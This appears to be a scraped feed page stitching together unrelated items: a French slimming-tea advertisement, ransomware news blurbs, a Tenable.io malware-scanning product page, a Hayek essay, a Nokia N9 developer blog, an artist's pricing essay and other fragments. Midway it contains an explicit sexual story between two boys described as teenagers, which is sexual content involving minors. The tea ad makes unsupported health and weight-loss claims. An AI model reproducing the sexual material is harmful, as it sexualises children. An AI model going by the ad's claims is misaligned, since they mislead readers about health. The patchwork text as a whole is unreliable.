La nature n’a pas fini de nous surprendre ! Apparemment, le secret de notre mieux-vivre réside au cœur de la nature elle-même. L’une de ces merveilles de la nature est la Malva Verticellata, plus communément connue sous le nom de mauve frisée ou mauve chinoise. Originaire de l’Indonésie et du Tibet, la mauve frisée est une plante médicinale utilisée depuis plus de 2 millénaires dans la médecine traditionnelle chinoise. C’est le maître Li Se-Shenqui qui l’a étudiée de près et qui a mis en évidence ses propriétés au XVIe siècle. Dépurative, laxative, émolliente, détoxifiante et diurétique, la mauve frisée conjugue les atouts. Elle est surtout connue pour éliminer les toxines à l’intérieur de l’organisme, y compris les graisses. Voilà pourquoi elle constitue un excellent choix en fin de régime. Elle évite de reprendre du poids. Mais les bienfaits surprenants de cette plante sont loin de s’arrêter là. La mauve frisée a aussi pour effet d’améliorer le transit et le système digestif. Il facilite l’évacuation des selles. C’est la raison pour laquelle une cure de malva verticillata est particulièrement recommandée aux personnes qui souffrent de constipation répétée ou qui ont un transit intestinal capricieux. Encore peu connue en France, la mauve frisée réduit la rétention d’eau. Elle augmente la sécrétion d’urine et en même temps débarrasse les toxines présentes dans le foie, la rate et les intestins. Ces derniers pourront alors reprendre leurs fonctions normales. Grâce à ces différentes vertus, la mauve frisée est un véritable trésor naturel pour la santé humaine. Associée à la Cassia Augustifolia, elle a une fonction émolliente. Elle ramollit les selles. D’ailleurs, les deux plantes sont exploitées ensemble pour former la tisane Nature Slim Tea extra forte. Cette tisane se présente en boîte de 30 infusettes dosées à 2,5 grammes chacune. La proportion est de 30% de L. malva verticillata et 70% de L. cassia Angustifolia. La mauve frisée est considérée comme une plante rare, vu qu’elle ne peut être récoltée qu’après 7 ans. C’est le délai nécessaire pour que la plante soit mature et qu’elle libère tous ses principes actifs. Une cure de Nature Slim Tea Extra Forte dure en moyenne 30 jours correspondant aux 30 infusettes contenues dans la boîte. Il faut faire une infusion par jour. Le temps d’infusion doit être inférieur à 5 minutes les trois premiers jours. Ceci est nécessaire pour permettre au corps de s’habituer. Après, vous pouvez augmenter le temps d’infusion jusqu’à 10 minutes. Attention, la tisane Nature Slim Tea Extra Forte est contre-indiquée pour les femmes enceintes et les enfants de moins de 12 ans. Les diabétiques sont aussi incités à consulter leur médecin, car cette tisane diminue le taux de glycémie dans le sang. Le pack duo Nature Slim Tea Regular et Nature Slim Tea Extra Forte d'une contenance de 30 infusions chacune, soit un total de 60 infusettes, est au prix de 43.90 € au lieu de 48.80 €. La boîte de Nature Slim Tea Regular d'une contenance de 30 infusettes est au prix de 22.90 €. Plus vous commanderez de boîtes, plus le prix sera dégressif. La boîte de Nature Slim Tea Extra Forte d'une contenance de 30 infusettes est au prix de 25.90 €. Plus vous commanderez de boîtes, plus le prix sera dégressif.
          A new ransomware is sweeping the globe, but there's a vaccine   
TwitterFacebook

It's a familiar story: You boot up your computer only to find a mysterious message saying your files are encrypted. You soon realize that your data is likely gone for good — even if you fork over a cryptocurrency ransom payment. 

But this time around, as a new and virulent form of ransomware dubbed NotPetya sweeps the globe, it doesn't have to be this way. 

Because this time around, there's a vaccine. 

What is NotPetya?

The first symptoms of the attack appeared on June 27 in Ukraine, with the National Bank of Ukraine and the Kiev International Airport both hit hard. Even Chernobyl's radiation monitoring system has reportedly been affected. But NotPetya, which targets the Windows operating system, didn't stay thereMicrosoft has confirmed that computers in 64 additional countries have been infected.  Read more...

More about Hackers, Hacking, Bitcoin, Ransomware, and Wannacry
          Microsoft exploits tax loopholes to dodge paying income taxes   

Microsoft, the software titan familiar to most Americans, has benefited handsomely from using loopholes in the federal tax code to avoid paying its fair share of corporate income taxes. The corporation has avoided paying $4.5 billion in U.S. income taxes in recent years, according to evidence presented by the Senate Permanent Subcommittee on Investigations (PSI). ...

The post Microsoft exploits tax loopholes to dodge paying income taxes appeared first on The Progressive Pulse.


          Staying Ahead of the Curve   
Tenable.io Malicious Code Prevention Report

As malware attacks continue to make headlines, many organizations struggle to stay ahead of the complex, evolving threat landscape. Attackers use both old and new ways to deliver malware through exploiting existing vulnerabilities, evading security solutions, and using social engineering to deliver malicious payloads. Millions of unique pieces of malware are discovered every year, and even with the best security controls in place, monitoring the thousands of endpoints within your network for malware can be nearly impossible.

Use Tenable.io to quickly address systems that are at risk

Once inside your network, malware can disable security controls, gain access to privileged accounts, replicate to other systems, or maintain persistence for long periods of time. If these risks are not addressed quickly, they can result in long term, devastating consequences for any organization. Using the Malicious Code Prevention Report from Tenable.io™ provides you with the visibility needed to quickly address systems that are at risk.

Malicious Code Prevention Report

Malware scanning

Tenable.io includes a customizable malware scan template where you can incorporate both good and bad known MD5 hashes, along with a hosts file whitelist. On Windows systems, hosts files contain commented lines of text that consist of two localhost address entries. Most systems will query local DNS servers to resolve domain names to IP addresses. Some organizations will add entries into hosts files for dedicated systems within their environment or to block unauthorized websites. Once a hosts file is modified, the local system will use the entries within the hosts file first and bypass records within your DNS server.

Malware also targets the hosts file to insert redirects to malicious sites or block security solutions from obtaining patches and security updates. For organizations utilizing the hosts file, the Malware Scan template provides you with the ability to add whitelist entries that would otherwise be flagged as abnormal by existing security solutions within your environment.

Malware Scan template

Enabling the File System Scanning option enables you to scan specific directories within your Windows environment such as the C:\Windows, C:\Program Files, and User Profile directories that are frequently used to install malware. You can also scan malware within directories such as C:\ProgramData that are hidden by default on Windows systems.

Scanning files

Organizations can have any number of mapped drives and devices connected to a system. Most anti-virus solutions only scan default directories such as the C:\ drive, and without additional rules in place, malware could easily bypass this security control via flash drive or external USB drive.

The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution

The Malware Scan template provides an additional layer of security to scan network drives and attached devices that may not be targeted by your anti-virus solution. Using the Custom File Directories option, you can include a list of directories within your scan to target mapped drives and attached devices.

Yara rules can also be incorporated into your Tenable.io malware scan. Using a combination of regular expressions, text strings, and other values, Yara will examine systems for specific files that match values within the rules file.

Vulnerabilities

The Malicious Code Prevention report provides a comprehensive overview of systems infected with malicious backdoors, hosts communicating with botnets, and vulnerabilities that can be exploited by malware just to name a few.

Along with malware and malicious processes, this report also highlights systems with vulnerabilities that are exploitable by malware. Exploitable vulnerabilities can provide attackers with a backdoor into your network to enable privilege escalation or launch malicious code.

Hosts with vulnerabilities that are exploitable by malware

Tenable.io uses both active and passive methods to detect malicious content

Tenable.io uses both active and passive methods to detect malicious content, including web traffic analysis, md5sum matching, public malware databases, and links pointing to known malware operators. Web servers hosting malicious content are also included within this report. Malicious code can be injected into website due to a cross-site scripting (XSS) or SQL injection vulnerability.

Attackers often target websites to deliver malicious payloads to a larger audience through message boards or blog posts. Malicious code often remains hidden within iframes, JavaScript code, and other embedded tags that link to third-party websites. This data can help you target and remediate issues on web servers before critical assets or services are impacted.

Botnets often use the HTTP protocol as well as encryption to evade detection by modern security solutions. Information reported by Nessus® and Nessus Network Monitor highlights active inbound and outbound communications with command and control (C&C) servers.

Hosts interacting with known botnets

Keeping your anti-virus clients updated helps to ensure your systems remain protected from malware. This report provides valuable information on the status of your anti-virus and anti-malware solutions, ensuring that they are installed and up to date. The Malware Protection chapter provides a summary of hosts running up-to-date anti-virus clients per operating system.

Anti-virus status

Tenable.io will analyze hosts with outdated anti-virus clients and provide targeted information you can use to remediate issues with anti-virus clients. Data is collected from Nessus that checks the status of various anti-virus clients across Windows, Linux, and Unix-based platforms. Using this information can also help you determine if your anti-virus client has been disabled.

Outdated anti-virus details

No organization is immune from vulnerabilities and attacks

No organization is immune from vulnerabilities and attacks. Knowing how systems are compromised can help target response efforts and minimize future damage. Tenable.io provides you with critical insight needed to measure the effectiveness of your security program, and to gain insight into your current risk posture. Using the Malicious Code Prevention report by Tenable.io provides you with targeted information to prioritize remediation efforts, close malicious entry points, and stay one step ahead of attackers and other persistent threats.

Start with Tenable.io

To learn more about Tenable.io, visit the Tenable.io area of our website. You can also sign up for a free trial of Tenable.io Vulnerability Management.


          Marginalia   

Corey Robin has written a long article arguing that Austrian economic thought and marginalism in general is descended from Nietzsche. Hence, Hayek et al are a bunch of aristocrats dedicated to oppressing society. I'd be happy to be persuaded that the marginalists -- at least as Robin uses the term, which isn't the only way -- are Nietzschean, but Robin's article didn't do it. Too many strong assertions based on tenuous evidence, and Robin is not exactly an impartial observer. This follow-on John Holbo post -- while exceptional in many ways -- doesn't do it either. Partially because it rests so heavily on a peculiar (I think) reading of this quote from Hayek in The Constitution of Liberty:

To grant no more freedom than all can exercise would be to misconceive its function completely. The freedom that will be used by only one man in a million may be more important to society and more beneficial to the majority than any freedom that we all use.

This does not have to mean that "some people’s freedom is a lot more valuable than other people’s freedom", as Holbo wrote in a previous post and quotes here. In light of the rest of Hayek's work (or even the rest of the passage from which this quote is pulled: see below) it is strange to argue that this passage means anything like what Holbo thinks it means: "Ideally, we would find that one man and even make all others his slaves, if that is what it took to let him exercise his freedom to the fullest. Hayek thus affirms a freedom monster argument somehat analogous to the classic pleasure monster reductio."

The Hayek quote refers to the exercise of liberty, which may not be universal even if the liberty is extended universally. Hayek is arguing that it does not follow from the fact that the exercise may be non-universal that the liberty should be restricted. Instead, those who would exercise their liberty should be free to do so. In fact, there are a million liberties. None of us can act on all them, but all of us will act on some of them. Restricting liberties that the majority isn't exercising may be tempting, but it would be wrong to do so since the exercise of liberties leads to the improvement of society. That's the argument.

To get from Hayek to Holbo's interpretation of Hayek you have to take a few steps. First you'd have to ignore the footnote on the very passage Holbo pulls, which contains this quote (from some people I've never heard of): "If there is to be freedom for the few who will take advantage of it, freedom must be offered to the many." How does that imply enslavement of the masses for the benefit of one? Suppose I proposed universal suffrage while acknowledging that many people will stay home on election day. Would that make me anti-democratic? It's a strange argument.

Hayek believes that social progress occurs partially through experimentation, the results of which are ex ante unknowable. The "unknowable" part is extremely important for Hayek. It's how he can simultaneously support a welfare state and public provision of public goods while opposing egalitarian redistribution and social ownership of the means of production. "Knowable" advances can be socially planned, and Hayek was fine with using the power of the state to do so. ("It is the character rather than the volume of government activity that is important.") Unknowable advances cannot be planned but are nevertheless desirable, thus experimentation must be allowed through constitutionalization and encouraged by the preservation of (market) reward for experiments that succeed. Holbo is correct that this is Millian -- J.S. Mill's "utilitarianism" is dynamic, not static: society benefits at time t+1 from the exercise of individual liberty at time t. Whether this is actual utilitarianism or something else is, I suppose, the question -- but wrong when he implies that Mill, by way of Hayek, was Nietzschean.

Hayek seems to believe that the majority of society will choose not to experiment because they are risk averse -- "The freedom that will be used by only one man in a million..." emphasis added -- or because they are exercising some other liberty, but it is socially optimal to have somebody doing some experimenting. Those who are interested in doing so, those who will exercise their liberties while others do not, should be allowed to do so, since society will benefit if they succeed. The rest of the passage in The Constitution of Liberty quote above goes:

The less likely the opportunity, the more serious will it be to miss it when it arises, for the experience that it offers will be nearly unique. It is also probably true that the majority are not directly interested in most of the important things that any one person should de free to do. It is because we do not know how individuals will use their freedom that it is so important. If it were otherwise, the results of of freedom could also be achieved by the majority’s deciding what should be done by the individuals. But the majority action is, of necessity, confined to the already tried and ascertained, to issues on which agreement has already been reached in that process of discussion that must be preceded by different experiences and actions on the part of different individuals. 
The benefits I derive from freedom are thus largely the result of the uses of freedom by others, and mostly of those uses of freedom that I could never avail myself of. It is therefore not necessarily freedom that I can exercise myself that is most important for me. It is certainly more important that anything can be tried by somebody than that all can do the same things… What is important is not the freedom that I personally would like to exercise but what freedom some person may need in order to do things beneficial to society. This freedom we can assure to the unknown person only by giving it to all.

How can one (e.g. Holbo) read this and come away thinking Overman? It's more like the open source movement. Which makes sense, since Hayek's view on this goes back to his 1945 essay "The Uses of Knowledge in Society". He argues there that because much knowledge is local, and centralized planning cannot incorporate local knowledge, that centralized planning will fail. This argument is what he's drawing from to say that the exercise of liberty by some -- who are in possession of local knowledge not available to all -- is not suboptimal.

Now, possibly you could argue that Hayek's view of the masses is too dim (even though he includes himself in them) and that is where the aristocracy comes in and takes us to Nietzsche. Or possibly you could argue that the "knowable" advances are greater than the "unknowable" advances. Indeed, this is the argument against which Hayek dedicated himself to in writing The Constitution of Liberty, which was published in 1960 -- a time after Sputnik when Paul Samuelson was predicting that the USSR's GNP per capita would surpass the US's within a generation or so -- so you'd at least be meeting him where he is. The question Hayek is trying to address is whether society will benefit more from planning or from spontaneous emergence. He obviously believes it is the latter. He may be wrong, but not because he's a Nietzschean.

The better argument is the one made by Amartya Sen: it is not necessarily local knowledge which precludes some from exercising certain liberties, but rather material opportunity. It may not be that some will not exercise their ability but that they cannot do so. In this case they are not free. Hayek says almost nothing about this directly, but does say that just because some are free does not mean that all should be enslaved. Those who can exercise their freedom should do so, as this will provide benefit for society.

This is the point, I think, that Hayek goes astray. His argument about the importance of local knowledge and decentralization falls apart when those with local knowledge cannot employ it and opportunity is centralized. His claim that innovations by the few will benefit the many is empirical: sometimes they do, often they do not. His argument that order is spontaneous is contingent, in other words, not a law of nature. Complex systems can, and do, break down. To simply admit does not require giving anything else up.

But, again, this is not Nietzschean. Which is why Objectivists do not like Hayek. This is an argument that Hayek should revise his beliefs to include a role for a marginally bigger -- although not fundamentally different -- state, or some other redistributionary apparatus. This is doable using Hayekian language, even if Hayek himself and many of his supporters recommend a minimalist state. Hayek is reconcilable with somewhat-modest forms of social democracy, in other words, and social democracy is reconcilable with a deregulated-but-redistributionary political economy.

But to do that you'd have to admit that Hayek was not quite a moral monster. Corey Robin is dedicated to showing that the right wing is authoritarian in all its guises. He believes that when Hayek writes "Why I Am Not A Conservative" he simply cannot be trusted: he's a reactionary like all the rest, and all the rest are motivated first and foremost by a lust for exploitation and oppression. There is nothing inherently wrong with this intellectual project, and I've learned a lot by following it. But it is inherently limiting at the same time, and it commits one to answers before questions have even been asked.


          Akademy Qt5 QtQuick course and Nokia N9 fun   

KDE Project:

I went to the day long course on Monday given by KDAB, about QtQuick for Qt5, and it was excellent. I had used Qt4 and QML for a Symbian phone project earlier this year, and the combination worked very well.

The course started with the basics, and in most repects Qt5 QML is pretty similar to the Qt4 version. I learned a few things about the parts of QML that I hadn't tried like state machines and transitions. It got interesting at the end when Kevin Ottens explained how you could include OpenGL fragment and vertex shaders in QML. This Pimp my video: shader effects and multimedia blog on Qt Labs show some sample code and a video of what it looks like running on a phone. My personal OpenGL foo isn't up to writing my own shaders, but there is a pretty complete library of canned effects, such as drop shadows, that comes with Qt5.

At lunch time, Quim Gil announced that all the registered attendees would receive Nokia N9 phones, and when we got them it felt like Christmas had come early this year for me. It really is a very fine phone. The UI is polished with plenty of apps, and the industrial design is slick. I tried the SIM from my ancient dumb Nokia phone and unfortunately it was too big to fit. I will have to get the data transferred to another card, or someone told me that it was possible to cut down an old large SIM to make it smaller. I am certainly looking forward to try it out as a phone.

Today I've been getting the N9 working as a development device. It is quite straightforward and you just need to activate 'developer mode' via an option on the Security settings panel. Then you configure Qt Creator with SSH keys to connect via the N9's USB cable (or WLAN works too) and you're done. I got a Hello World app working, and then tried to port the large Symbian app to the N9. The port was a bit more trouble than I was expecting due to a problem with upper case characters in the app name, and other problems related to doing development under Mac OS X. I had developed the Symbian app under Linux and Windows, and I think it would be best to give up on Mac OS X for the N9 and use Linux instead.

I ssh'd onto the N9 and fished around a bit to see what was there. It has perfectly standard Debian packaging, and when you build an app in Qt Creator a .deb is transferred to /tmp and installed from there. The root partition has 2GB free to install apps which should be plenty and there was another partition with 7GB free for pictures, documents, maps and so on.

I did some work on the QSparql library that is used for interfacing Qt apps with the Tracker Nepomuk store, and it was nice to see that the lib came with the phone. But it didn't come with the driver for accessing SPARQL endpoints though, and I couldn't find that driver with an 'apt-cache search' query. I might have to build and install it myself.

I noticed that none of the apps that were pre-installed used QML, and they used the obsolete MeegoTouch libs instead. I asked about installing Qt5 on the N9 at the QtQuick course and apparently it is quite straightforward.

I can confirm what other people have said about the N9, and how great the UI and phyisical design is, with a very nice development environment. I also thought Qt/QML on Symbian works really well. So I feel puzzled by Stephen Elop's unsuccessful Windows Phone 7 strategy. If WP7 isn't taking off now, I can't see how WP8 based on the Windows NT kernel is going to be any more successful. I can't imagine why anyone would want to buy a WP7 device when Microsoft announced the other week that there would be no forward path for existing WP7 phones to run WP8.

I saw Aaron Seigo and Sebastian Kugler give a couple of great presentations about Plasma Active at the Akademy conference last weekend. The highlight was Aaron laying into so called 'Tech Pundits' who said that Plasma Active can't possibly compete with Android. Aaron pointed out that actually Android had Plasma Active had nothing much in common, and the clueless pundits were doing something like criticizing an Italian meal at a restaurant for not being a French meal. An activity based tablet is made of very different stuff to the conventional 'Bucketful of Apps' approach used by Android and iOS. By not competing with that approach head on, and having a very lean operation they can construct a viable business even with relatively small sales.

If the Nepomuk store in Plasma Active can be used as a basis for the activity based app integration then so could the similar (although less powerful) Tracker store in the N9. That is another powerful capability of the N9 that has yet to be exploited by 3rd party apps. The N9 Tracker app data integration is much more powerful than the Windows Phone 7 hubs and active tiles. Perhaps some kind of nice notification center is perhaps the main N9 feature that could be improved as far as I can see.

Oh well, I just hope that Nokia will be able to sort themselves out, and recover from the train wreck that they appear to be at present. And thanks again guys for the N9.


          [Em respeito e defesa da vida animal] Moderar: “WSPA e Ecosul promovem campanha contra a Farra do Boi”   
Novo comentário sobre o seu post #418 “WSPA e Ecosul promovem campanha contra a Farra do Boi” aguarda aprovação http://www.leideprotecaoanimal.com.br/?p=418 Autor: zespassaltSap (IP: 91.121.55.3 , 91-121-55-3.ovh.net) Email: incomehybrid@gmail.com URL : http://www.income-hybrid.net Whois : http://ws.arin.net/cgi-bin/whois.pl?queryinput=91.121.55.3 Comentário: Hi webmaster I want to let you now about Income Hybrid. It’s great software that can earn you thousands per month by exploiting [...]
          Dozens Testify at Hearing on Bill Requiring Background Check on Gun Sales   
New Hampshire lawmakers heard hours of testimony Thursday on a bill that would require background checks for commercial firearm sales. Representative Katherine Rogers,the main sponsor on the bill, says it’s designed to fill perceived loopholes in New Hampshire gun regulations. "The current system’s loophole is exploited by criminals," Rogers says, "who can avoid background checks by purchasing firearms from unlicensed private sellers, often at gun shows, or through anonymous online transactions." Testimony on the bill Thursday ranged from tearful accounts of gun-related domestic violence, to concern that the bill is a slippery slope to second amendment violation. Alan Rice, Director of the New Hampshire Firearm Coalition, saw extreme restriction in the bill’s language. "Representative Rogers does not want young people," says Rice, "or anyone else for that matter, to own, possess, or use firearms." It's just one of dozens of arguments legislators will have to consider before they vote.
          Petya ransomware epidemic spreads, old NSA Windows exploit may be key   
The New York Times said cybersecurity experts at Symantec indicated the attack is hitting Windows computers through an NSA-developed … The tech below the surface Edge-to-edge displays on cell phones are becoming a thing now, with handsets like the …
          When I was in Africa   
When I was a teenager my father worked for an oil company and he would be sent overseas for months at a time. My parents were divorced and I lived with my father. When he was sent overseas and I was not in school I would accompany him. One time he was sent to Africa and I accompanied him. We stayed in a company rented house and there was a caretaker who took care of the house and did what ever household chores needed doing. His name sounded like Tekis. He was a black man in his early 30's who was very friendly and fun to be around. He was like family to us and we were special to him as well.

When my father would be working in the field sometimes I could accompany him but when he was in the office I had to stay home. Tekis and I became good friends and I learned a great deal about his background and his family. Because we became close as family sometimes Tekis would bring his son to stay with us. His son was named Ande and he was about my age, very outgoing and had a warm personal style that made everyone feel like he was their special friend. We became very good friends and enjoyed hearing about each others country, childhood and plans for the future. When ever Ande stayed over we would stay up late and watch movies and play games.

When Ande would stay over he would stay in my room. My room had two beds, a queen sized bed I slept on and a single bed where Ande slept. We were young boys who shared a bathroom and bedroom and we would change in each others presence and were very comfortable together. Often at night when it was time to go to bed we'd both take a shower and then we'd be on my bed in our underwear talking till it was time to go to bed, then Ande would go to his bed to sleep.

One night we were up very late and we had been watching a movie that had a number of sex scenes and when we went to the bedroom the topic of girls and sex came up. I had fooled around with a few girls but never made it all the way to intercourse. Ande had more experience than I which seems to be a cultural thing. We were talking about what we had done sexually and very naturally Ande asked me if I had ever done anything with another boy. I said "no" and he told me about how he and some friends had been naked together and had touched each other and that one of his friends like to give head. It didn't seem like a bad thing to me. I think he could tell I wasn't offended and was interested as he told me about his exploits. Just as naturally as Ande asked me if I had done anything with another boy, he asked if I would I would like him to suck me. I was very horny from our discussion and I said yes, but I was scared just because I had no idea what it would feel like and the whole thing seemed risque. He told me to take my underwear off. I slipped my underwear off and laid back and suddenly I felt his warm mouth on the head of my circumcised penis. He just took the head in his mouth and just moved his tongue around slowly. It felt really good. I was just laying there enjoying how good it felt. When I masturbated I would do it very fast and get to an orgasm as quickly as I could. But this was different. I wasn't even thinking about having an orgasm. What Ande was doing just felt good but it was slow and for the longest time it just felt the same, very good, and I just laid back and thought at some point he would just stop. But eventually I could feel that feeling starting to build and finally I came in his mouth. I wasn't even thinking that I would come in his mouth, I was just absorbed in my own feelings. When he stopped and laid next to me I could see that he had an erection and I felt like I owed him something so I asked if he would like me to suck him. He said "of course" and he slipped off his underwear. I put my face down by his cock and it was beautiful and scary at the same time. I didn't really know what to do. I took his cock into my mouth and did for Ande what he did for me. But it wasn't long and his hips started thrusting back and forth. I guess I didn't do it very well because he slipped his hand down and started to stroke his cock as I swirled my tongue around his head. Stroked harder and harder and then when he was ready to cum he pushed my head away and he came on his stomach. We laid there together for a while and then he got up and went to the bathroom and cleaned himself up. When he came back he asked if I'd like it if he slept in my bed and I said yes. We got under the covers and talked a bit more about sex and touched each other. It was so nice having him in my bed, being able to touch his beautiful smooth black body and have his hands exploring my body. I loved touching his balls and penis, and running my hands over his smooth thighs and chest.
          Worth   
Having just finished Freakangels, I'm in a delicate position with my work; my career is still quite young (I've only been self employed for 6 years) but having published 6 volumes of Freakangels, along with The Tempest and 3 shorts (over a thousand pages of comics) I feel like I've got a reasonable amount of experience behind me.

I'm now in the process of looking for new work, taking on commissions and working on pitches. It's really exciting and really nerve-wracking all at the same time, but the one thing that is cropping up over and over as a theme in everything I'm dealing with post-Freakangels is "what am I worth?" It's a bloody hard question.

As much as art is a career to me now, it's been a hobby for much longer, and there are plenty of people around me (both at conventions and online) whose work I respect that do comics or illustration for pleasure or in their spare time. It's a tricky industry to find work in, even if you're talented, and I feel lucky to be in the position that I am - coming off the back of a long and popular series for which I was paid enough to live on, even in the middle of a recession. On the other hand, illustration (under which I include comics) is my job - it's a skill I've developed that I've devoted my life to, invested my education in, and pursued full-time. There was just as much effort involved in earning the money I have as there would have been in any career.

So how do I define my worth? If I was in a "normal" career, my income would be classed as low for my level of experience and expertise. My sister (2 years younger than me, working in marketing) has already been promoted once, and earns more than I do. Something similar goes for most of the friends I had in college who went on to find jobs in their own fields. I earn under the average (both median and mean) for my age, my gender and my level of education. Financially, I'm bringing in just enough for a comfortable day-to-day life, but I can't afford savings, investments or any financial security: my assets are limited to my personal possessions and my skills. In order to achieve this status, I've also had to work hard enough that the stress levels involved endangered my health last year, and I'm still dealing with the fallout from that.

This my sound like a litany of complaints, but it's just the truth. These are all facts I have to consider when I figure out how much to charge for my work.

So when someone asks "how much will this illustration cost?", "what do you charge for a workshop?" or "what is your page-rate?" They're loaded questions!

Lets say that I thought my work was worth an annual salary of £20,000 which is a reasonable wage for my circumstances. Let's say that in a year I would expect/aim to work 5 days a week and 40 weeks a year (to take into account moments when I either need to rest or can't find work). The maths is very simple - 5 days a week for 40 weeks comes to 200 days a year. In order to earn £20,000 a year, I would need to earn £100 a day. That's disregarding the loss from taxes or the time taken up with self-promotion and admin, but let's keep this simple!

I managed to get 6 pages of Freakangels done a week because I hired 2 colourists, so in reality a comic page from beginning to end takes me about 2 days' work. Illustrations are harder to pin down because of varying complexity, the time spent on revisions, talking to the client, and setting up the commission. Sometimes an illustration can take many days, sometimes only one day, so I charge accordingly. This means that in order to earn a reasonable salary, my page rate for comics should be £200, and my rate for commissions should be £100-£1000 depending on the time taken (I've never spent longer than ten days on a commission, or less than one day).

However, anyone who has tried to charge for their services or entered into a contract with a publisher knows that rates like those are extremely ambitious. It wouldn't be hard for clients to find other artists who can charge significantly less because their art doesn't fully support them financially, or because they work faster, or because they're brand new to the profession. Also, the chances that a client is considering anything that I've mentioned so far in this blog post will be quite low - they'll be assigning value to the art, not to my time and expertise. To many companies, comics aren't worth much money, and to many people art is a trivial part of life with little intrinsic value. So when dealing with what my livelihood is worth, I'm dealing with my personal situation, the relationship that has to the situations of other artists, plus the perceived worth of my style and my medium.

There really are no easy answers, and the actions of everybody in the industry (commissioners, publishers and artists) have an impact on how much room we all have to negotiate our worth.

Charging less could get me more work, but will increase my stress levels, and there's a practical limit to how much I could do this because I still need to support myself. One one hand, this gives publishers or those with budget a way to exploit artists, but on the other, it lets enthusiasts and fans with less budget afford what I'm producing. It also tends to produce work of a rushed quality because I'm forced to fit more work into less time.

Charging more will get me less work, but assuming I find enough, it will also give me a comfortable life with less long-term stress and perhaps the chance of saving for the future. It encourages an industry in which publishers spend good money for carefully produced art, but also one in which art becomes harder for casual fans to afford.

Ultimately, any decisions I make will be deeply mired in the economy that surrounds us and regulates our lives. The value of a life, the effort involved in skill, the usefulness of a trade, or the time invested in a livelihood are only secondary players when it comes to how much we're each worth. Those factors are ruled over by the luck of the draw, the value of markets, and most importantly by the perception of value held by the many people who invest in those markets. Sometimes that system supports us, sometimes it doesn't, but the thing that frustrates me most is the subtle way that it distorts our regard for human worth. We are naturally drawn towards bolstering our own worth in order to live more comfortably, but the more we do, the less accessible the things we produce become to people with less income.

All of the biggest assumptions we make about other people's lives, the accuracy of class clichés, the value of various livelihoods, and even our political affiliations spring from how we attempt to explain why everyone isn't financially successful. Those assumptions are in turn are the only things with which we can excuse ourselves for capitalising fully on our work, and cutting less successful people out of our immediate economic circle.

Of course, we all know that eventually the wealth "trickles down", don't we?
          Re: Sex tourism in Gambia...   
From www gvnet.com I transfer the fllowing passage.

Human Trafficking and Modern-day Slavery

The Gambia is a source, transit, and destination country for children and women trafficked for the purposes of forced labor and commercial sexual exploitation. Within The Gambia, women and girls, and to a lesser extent boys, are trafficked for sexual exploitation, in particular to meet the demand for European sex tourism, and for domestic servitude. Boys are trafficked within the country for forced begging by religious teachers and for street vending. Transnationally, women, girls and boys from neighboring countries are trafficked to The Gambia for the same purposes listed above. Primary source countries are Senegal, Mali, Sierra Leone, Liberia, Ghana, Nigeria, Guinea-Bissau, Guinea and Benin. Trafficking of Gambian boys to Senegal for forced begging and Senegalese boys to The Gambia for the same purpose is particularly prevalent. Gambian women and girls are trafficked to Senegal for domestic servitude, and possibly for sexual exploitation. Gambian women and children may be trafficked to Europe through trafficking schemes disguised as migrant smuggling. Reports in the last two years of Gambian, Senegalese, and nationals of other neighboring countries being transported from The Gambia to Spain by boat appear to be predominantly cases of smuggling rather than trafficking. - U.S. State Dept Trafficking in Persons Report, June, 2008 [
          Introducing the New ActiveRain Home Page Activity Feed   
Notice something different? We just did a major overhaul on the content that appears on the ActiveRain home page! Every day on ActiveRain we receive nearly 1,000 blog posts and questions from our amazing community.  One of the biggest challenges for us is to find the most thought-provoking content and make it discoverable to the community at large. Historically, ActiveRain has had a secret group of members who had the power to "feature" a blog post or a question which would prompt it to appear on our home page.  The quality of these selections was amazingly good, but what always hurt to think about were the 990 other pieces of content that day might never see the light of day. What Gets Selected for the Home Page? On our new home page, we are looking to include a lot more content in the activity feed. In addition to our hand-picked (featured) blogs and questions, we are now including:"Popular Blogs" that receive a certain number of Likes "High Traffic Blogs" that receive a certain number of pageviews "Popular Questions" that receive a certain number of Answers "Popular Answers" that receive a certain number of Upvotes "Follow this Member" call-outs for people who reach the 200,000 point milestone While we definitely want to be a transparent about what we're up to, we aren't revealing any of the exact formulas that surface content. The fact is, some of our point-crazed members will look for ways to exploit this new system so we'll frequently be changing the criteria. How Do I Get My Content Highlighted? The beauty of this new system is that so many more people can find their way to the home page.  Here are the tips that will get you ranked: Write Great Content - Hopefully, this was an obvious one for you. When you write thoughtful content that helps our community do their jobs better and live their lives fuller, we'll see "social signals" from the community such as Likes, Upvotes, etc. Share It - Share your blog posts on Facebook, LinkedIn, and other social networks.  Get it in the hands of your peers and your contacts.  When we see traffic reaching your content, we assume that you've written something worth reading! Build Your Audience - We are doing a lot of work on the idea of Following people on ActiveRain.  Here is your "insider tip" if you're still reading this post... START FOLLOWING MORE PEOPLE!!!  We have some cool projects in the works to reward the people who are creating connections in the community. What Happens Next? We are going to be watching this activity feed in the coming weeks to make sure everything continues working as we expect it to it to. Will there be bumps in the road? You bet. This change definitely has some risk but if our predictions are right on the benefits to our community it will be worth it. All of our team here would like to extend our most heartfelt thank you to our secret team of "feature fairies".  Your work over the years has molded this community and your contribution is invaluable.  We know that this is a huge change for you guys and it wasn't something we take lightly.  We wrote some special rules in the code to make sure you are still able to suggest the best of the best blog posts to our community and look forward to having your suggestions fuel our Daily Drop newsletter.--- Keep Up In the Rain!
Enter your email address: Delivered by FeedBurner

             
Africa where nature has remained unchanged for your sake.........with over 100,000 elephants..... how naturally remained is that what you offer in african terms....? its called prostitution and/or exploitation sucking white dicks for money I call that post-post-colonialism. sorry for being rude, but i think it stinks what u do. jay-b
          Hackers and virus-makers accidentally send their code to Microsoft all the time   

Want to know one of the biggest and most surprising ways that Microsoft manages to protect its Windows 7 operating system from zero-day exploits, viruses and malware? According to Microsoft senior security architect […]

The post Hackers and virus-makers accidentally send their code to Microsoft all the time appeared first on Geek.com.


          Jam Day Hack Cheat Tool   

